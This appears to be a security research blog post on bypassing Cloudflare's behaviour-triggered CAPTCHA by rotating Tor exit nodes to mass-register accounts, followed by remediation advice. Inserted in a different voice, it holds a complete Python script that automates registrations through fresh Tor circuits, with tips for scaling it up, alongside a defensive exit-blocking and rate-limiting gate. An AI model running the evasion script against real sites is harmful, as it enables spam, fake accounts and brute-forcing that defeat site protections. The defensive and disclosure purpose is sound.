SpiderLabs Blog

Unveiling the CAPTCHA Escape: The Dance of CAPTCHA Evasion Using TOR

Threat actors are tireless in probing online platforms for ways to exploit vulnerabilities and gain unauthorized access, using anything from simple to sophisticated attacks. This post looks at how attackers get around one of the most common defenses against automated attacks, specifically by using the Tor network to evade or bypass CAPTCHA.

 

CAPTCHA

Figure 1. Some examples of CAPTCHA and verification challenges

Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) is a well-known security control used to protect applications from automated attacks. It presents a challenge to visitors to establish that they are human rather than automated scripts or bots. The most common forms are the "I'm not a robot" checkbox and puzzles that require users to identify objects in images or perform other tasks that are difficult for automated scripts to complete.

 

Cloudflare

Figure 2. Simple illustration of the Cloudflare model

Cloudflare provides a wide range of security and performance services for websites, mobile applications, and other online services. It acts as a reverse proxy and content delivery network (CDN) in front of the application, which also conceals the origin server's IP address from potential threat actors. On top of that it offers security features such as DDoS protection, a web application firewall (WAF), and bot mitigation, to name a few.

 

By enabling Cloudflare's challenge pages (CAPTCHA), website owners can reduce the risk of spam submissions, brute-force attacks, and other automated activity that can disrupt their services. The challenge verifies that incoming traffic comes from a human before it reaches the application.

 

TOR

Figure 3. Illustration of a user browsing a website over Tor

Tor, short for 'The Onion Router,' is a free and open-source project for online privacy and anonymity, originally developed at the U.S. Naval Research Laboratory. It routes Internet traffic through a network of volunteer-operated servers referred to as 'nodes' or 'relays', so the destination only ever sees the address of the last hop, the exit node. It is worth noting that Tor is also used to access the dark web, the portion of the Internet not indexed by traditional search engines, which hosts websites and services associated with various activities, including those of a questionable or illegal nature.

 

Evasion/Bypass

 

While doing a bit of research, I discovered how to evade or bypass Cloudflare’s CAPTCHA challenge. 

 

Upon investigating an application, I saw that the CAPTCHA was missing for the login and registration pages, but as it turned out, CAPTCHA was lurking ahead.

Figure 4. The application login page without CAPTCHA implemented

Figure 5. The application registration page without CAPTCHA implemented

 

I signed up for test accounts on the target app without any issues using my email aliases. Shortly afterwards, I noticed that no verification link had been sent by email. Since a newly registered account is usable without verification, it follows that any unregistered or even non-existent email address can be used for registration. On its own this is a gap; it becomes a serious issue when chained with others such as missing or weak CAPTCHA, username enumeration, no account lockout, or no rate limiting. So, I decided to create a PoC to demonstrate the impact of this security flaw.

Figure 6. Landing page after successful registration

 

I thought this would be a straightforward process. However, I recalled from the reconnaissance results that the application uses Cloudflare, and as a Cloudflare user myself, I thought there should be some mildly amusing security controls in play.

Figure 7. Initial automated registration PoC showing that requests were redirected to the /challenge (CAPTCHA challenge) page

 

I tried automating registration and was not surprised with the result. I tried again using various tweaks, including variations in delays and threads, hoping that those would suffice. But still, no luck.

Figure 8. Example application response with CAPTCHA challenge

Macros could be useful, but I wanted a fully automated demonstration. Hopping in and out of the application using our source addresses, I was again able to register accounts.

 

To get a better grasp of what we’re up against, I logged in to my Cloudflare account to browse and see the available configurations, etc.

Figure 9. CAPTCHA customization for application page(s)

Figure 10. CAPTCHA customization preview

 

I found out that Cloudflare offers challenge page customization on paid subscriptions. Below are the customizable challenge and block page types:

  • cf-error:1000s
  • block:ip-ban
  • block:rate-limit
  • block:client-auth
  • block:basic-sec-captcha
  • block:country-captcha
  • block:adv-sec-captcha
  • block:waf
  • block:iuam-basic
  • cf-error:500s
  • always-online:no-copy
  • phishing:warn
  • regulation:block

 

So, at this point, we know that Cloudflare is intervening in the automated requests based on the source IP address. I also found that Cloudflare allows connections from Tor users by default. Then I remembered a simple script I had created for an earlier research project.

 

PoC

 

Figure 11. Simplified illustration of the attack

 

The idea is quite simple: use a different source address for every transaction by sending each request through Tor, so the target sees a different exit node each time and no single IP address accumulates enough requests to trigger the challenge. The same technique is used for brute-forcing OTPs (one-time passwords), OTCs (one-time codes), and other second factors, and it can also help with various injection attacks. One researcher previously published on using AWS to brute-force iTunes' or iCloud's OTPs for better control over the source addresses. Despite its limitations, Tor is easily accessible and makes it easy for anyone to carry out or simulate these kinds of attacks.

Figure 12. Example script used

 

As an option, we can use Nyx, the Tor command-line monitor, to watch the circuits, events, and logs, and to request a new identity (exit address) on demand. In this instance, the script above was sufficient for our purposes.
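The rotation logic described above, as an added example rather than the script from the original post: this is my own Python, it assumes a local tor daemon with SocksPort 9050 and ControlPort 9051 protected by a HashedControlPassword, and the target host, path, email aliases, and passwords in the `__main__` block are hypothetical placeholders. It asks tor for a fresh circuit before every request (SIGNAL NEWNYM over the control port), tunnels the HTTPS request through the SOCKS port, and reports whether the application answered or Cloudflare redirected to /challenge as the figures show.

```python
"""Per-request Tor exit rotation with Cloudflare challenge detection.
Added example; not the original post's script. Assumes tor listening on
SocksPort 9050 and ControlPort 9051 with a HashedControlPassword set."""
import http.client
import json
import socket
import ssl
import struct
import time

TOR_SOCKS = ("127.0.0.1", 9050)    # assumption: default SocksPort
TOR_CONTROL = ("127.0.0.1", 9051)  # assumption: ControlPort 9051 in torrc


def control_commands(password: str) -> list:
    """Control-port lines that authenticate and ask tor for a new circuit.
    The password is the clear-text value matching HashedControlPassword."""
    quoted = password.replace("\\", "\\\\").replace('"', '\\"')
    return [('AUTHENTICATE "%s"\r\n' % quoted).encode(), b"SIGNAL NEWNYM\r\n"]


def control_ok(reply: bytes) -> bool:
    """Every successful control-port reply starts with status 250."""
    return reply.startswith(b"250")


def new_identity(password: str, addr=TOR_CONTROL) -> None:
    """SIGNAL NEWNYM makes tor build new circuits for subsequent streams.
    Tor rate-limits the signal to roughly one per 10 seconds; callers that
    loop faster simply reuse the current circuit (and exit)."""
    with socket.create_connection(addr, timeout=10) as ctl:
        for line in control_commands(password):
            ctl.sendall(line)
            reply = ctl.recv(4096)
            if not control_ok(reply):
                raise RuntimeError("control port rejected %r: %r" % (line, reply))
        ctl.sendall(b"QUIT\r\n")


def socks5_handshake(host: str, port: int) -> tuple:
    """SOCKS5 greeting (no auth) and CONNECT with a domain name (ATYP 0x03),
    so the name is resolved by the exit node instead of leaking via local DNS."""
    greeting = b"\x05\x01\x00"
    name = host.encode("idna")
    connect = b"\x05\x01\x00\x03" + bytes([len(name)]) + name + struct.pack("!H", port)
    return greeting, connect


def socks5_reply_ok(reply: bytes) -> bool:
    """VER=5, REP=0 means tor opened the stream to the target."""
    return len(reply) >= 2 and reply[0] == 0x05 and reply[1] == 0x00


def tor_https_connection(host: str, port: int = 443) -> http.client.HTTPConnection:
    """Open a TLS session to host:port tunnelled through the tor SOCKS port."""
    sock = socket.create_connection(TOR_SOCKS, timeout=60)
    greeting, connect = socks5_handshake(host, port)
    sock.sendall(greeting)
    if sock.recv(2) != b"\x05\x00":
        raise RuntimeError("tor SOCKS port refused the no-auth method")
    sock.sendall(connect)
    if not socks5_reply_ok(sock.recv(262)):
        raise RuntimeError("tor could not reach %s:%d" % (host, port))
    tls = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    conn = http.client.HTTPConnection(host, port)  # plain client on top of our TLS socket
    conn.sock = tls
    return conn


def is_challenge(status: int, headers: dict) -> bool:
    """The post observed a 302 to /challenge whenever Cloudflare stepped in."""
    location = headers.get("Location") or headers.get("location") or ""
    return status in (301, 302, 303, 307, 308) and "/challenge" in location


def register(host: str, path: str, email: str, password: str, control_password: str) -> bool:
    """Rotate the circuit, POST one registration, and report whether the
    application (rather than the Cloudflare challenge) answered."""
    new_identity(control_password)
    time.sleep(1)  # let tor finish building the new circuit
    conn = tor_https_connection(host)
    body = json.dumps({"email": email, "password": password}).encode()
    conn.request("POST", path, body, {"Content-Type": "application/json"})
    resp = conn.getresponse()
    headers = dict(resp.getheaders())
    conn.close()
    return not is_challenge(resp.status, headers)


if __name__ == "__main__":
    # Hypothetical target and aliases; only run against systems you are authorised to test.
    for n in range(5):
        ok = register("app.example.test", "/register",
                      "alias+%d@example.test" % n, "Pass-w0rd-%d" % n, "s3cret")
        print("attempt %d -> %s" % (n, "registered" if ok else "challenged"))
        time.sleep(10)  # NEWNYM rate limit: looping faster reuses the same exit
```

Two caveats a tester should keep in mind: a new circuit does not guarantee a different exit node, and tor honours NEWNYM only about once every 10 seconds per client. To go faster, run several tor instances on different SocksPort/ControlPort pairs, or rely on SOCKS username/password stream isolation (IsolateSOCKSAuth, on by default), which gives every distinct credential pair its own circuit without touching the control port.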

Figure 13. Nyx monitoring view

 

Here we can see the script execution without HTTP 302 redirections to the CAPTCHA challenge page.

Figure 14. Automated registration of accounts using TOR

We know that we've succeeded because the registration notifications are in!

Figure 15. Example notification emails received

 

In the demonstration above, the Cloudflare challenge was not configured to always require CAPTCHA; it was triggered by the behaviour Cloudflare observed from a given source address. Using Tor, we avoided it by hopping through hundreds of available Tor exit nodes, so no single address ever looked suspicious enough to be challenged.


Anyhow, the remediation is quite simple. Always require CAPTCHA on pages that unauthenticated users can abuse, such as registration pages, rather than relying on behaviour-based triggering. Combine it with other security controls such as CSRF tokens, rate limiting, and email verification.

 

Additionally, if we want to block Tor sources when using Cloudflare, there is a simple way to block all exit nodes advertised on torproject.org. Cloudflare represents Tor exit nodes with the country code "T1", so we can create a firewall rule that blocks (or challenges) that code.

Figure 16. Number of available exit nodes from torproject.org

Figure 17. Example of creating a rule to block TOR source addresses

Figure 18. Error shown to users accessing after blocking
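The server-side equivalent of the rule in Figure 17, for an application that is not behind Cloudflare, as an added example that is not code from the original post: the exit list format matches the one published at https://check.torproject.org/torbulkexitlist (one address per line), but the addresses embedded here are constructed samples, not real relays, and the RegistrationGate class, its thresholds, and its verdict strings are my own. It shows the three controls the post recommends in one decision: block known exits, always require a solved challenge on the registration endpoint, and rate-limit bursts from one source.

```python
"""Gate a registration endpoint with a Tor exit-node check, an unconditional
challenge requirement, and a per-source rate limit. Added example; the sample
exit list is constructed and must be replaced by a freshly downloaded one."""
import ipaddress
import time
from collections import defaultdict, deque

# Constructed sample in torbulkexitlist format (one exit IP per line).
# Real deployments refresh https://check.torproject.org/torbulkexitlist regularly.
SAMPLE_EXIT_LIST = """\
# constructed sample, not real relays
198.51.100.7
203.0.113.42
2001:db8::1
not-an-address
"""


def parse_exit_list(text: str) -> set:
    """Parse the bulk exit list into a set of ip_address objects; skip
    comments and anything that is not a valid IPv4/IPv6 literal."""
    exits = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            exits.add(ipaddress.ip_address(line))
        except ValueError:
            continue  # malformed line in the feed; ignore it
    return exits


def is_tor_exit(addr: str, exits: set) -> bool:
    """True when the request's source address is a known Tor exit."""
    return ipaddress.ip_address(addr) in exits


class RegistrationGate:
    """Verdict for a POST /register from a given source address:
      block         - source is a Tor exit (the Cloudflare "T1" rule)
      rate_limited  - too many attempts from this address in the window
      challenge     - no solved CAPTCHA token presented; always required
      allow         - challenge solved and within limits
    """

    def __init__(self, exits: set, max_per_window: int = 3,
                 window: float = 60.0, clock=time.monotonic):
        self.exits = exits
        self.max_per_window = max_per_window
        self.window = window
        self.clock = clock  # injectable for testing
        self.attempts = defaultdict(deque)

    def decide(self, source_ip: str, challenge_passed: bool = False) -> str:
        if is_tor_exit(source_ip, self.exits):
            return "block"
        now = self.clock()
        recent = self.attempts[source_ip]
        while recent and now - recent[0] > self.window:
            recent.popleft()  # drop attempts outside the sliding window
        recent.append(now)
        if len(recent) > self.max_per_window:
            return "rate_limited"
        if not challenge_passed:
            return "challenge"  # never skip the CAPTCHA on registration
        return "allow"


if __name__ == "__main__":
    gate = RegistrationGate(parse_exit_list(SAMPLE_EXIT_LIST))
    for ip, solved in [("203.0.113.42", True), ("192.0.2.1", False), ("192.0.2.1", True)]:
        print(ip, "->", gate.decide(ip, challenge_passed=solved))
```

On Cloudflare the same decision is a custom rule with the expression `(ip.geoip.country eq "T1")` and the Block action, plus a Managed Challenge rule on the registration path. Note the ordering in `decide`: the per-IP rate limit is exactly the control that exit rotation defeats, which is why the challenge is required on every attempt rather than only after a burst, and why the exit list must be refreshed often (relays churn daily) and treated as one layer, not the fix.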

 

I want to highlight the importance of identity or account verification. Although it won’t always pose a high risk as is, allowing account registrations without proper verification could be troublesome.

 

We can also view this as a low-grade denial of service. For example, if an attacker registers accounts with email addresses ahead of their actual owners, those owners will need to take additional steps to recover the accounts, such as contacting support, especially if the affected app has no password reset functionality. In addition, insecure registration functionality can aid threat actors' phishing campaigns, malware distribution, and so on.

 

In another attack-chain use case, if a targeted application is vulnerable to other attack vectors such as cross-site scripting (XSS), the actor can register using the victim’s email or register accounts using dumped emails, etc., and add malicious payloads to the user-accessible areas, such as the account profile section. When the account owner initiates a password reset and gains control of the account, the payload will then execute in the victim’s context.

 

A properly implemented CAPTCHA raises the overall security of an application. Properly implemented 2FA/MFA, one-time codes, and account verification should also be in place.

 

AI VS CAPTCHA

 

I remember when I first had a flatbed scanner back in the mid-2000s. It came with a CD containing driver software, an image scanning editor, and OCR software. I still remember the name “OmniPage.” OCR stands for "Optical Character Recognition." It is a long-existing technology that detects text in images. It is commonly used to convert scanned documents or images into digital text. I was so amazed and perplexed at the same time back then by how it functions. Today, we can use our phones to convert images to text and even translate them in real-time.

Figure 19. Example of using OCR to solve an arithmetic-based CAPTCHA with a script

 

Now, AI can be used to solve CAPTCHA challenges to some extent by using OCR and other complex algorithms. While traditional CAPTCHAs were initially designed to be difficult for automated scripts to solve, advancements in AI and machine learning have made it possible to develop algorithms and models that can recognize and solve certain types of CAPTCHAs with a high degree of accuracy and efficiency. There are companies offering CAPTCHA solving as a service using AI.

Figure 20. Some examples of CAPTCHA challenges claimed to be solvable by AI

 

Conclusion

 

AI has opened a new paradigm in cybersecurity, including automation against applications, and threat actors can abuse it in several ways. For example, it can be used to spam websites or services, disrupt user experiences, and perform brute-force attacks on login and registration forms. Automated CAPTCHA solving may also enable unauthorized data scraping, potentially violating terms of service and legal agreements. While there are legitimate uses for CAPTCHA-solving automation, it is essential to deploy it responsibly and within legal and ethical boundaries. As the role of CAPTCHA, MFA/2FA, and other security controls evolves, security engagements such as penetration testing and collective research drive the improvements needed to secure applications and systems against the onslaught of automation.
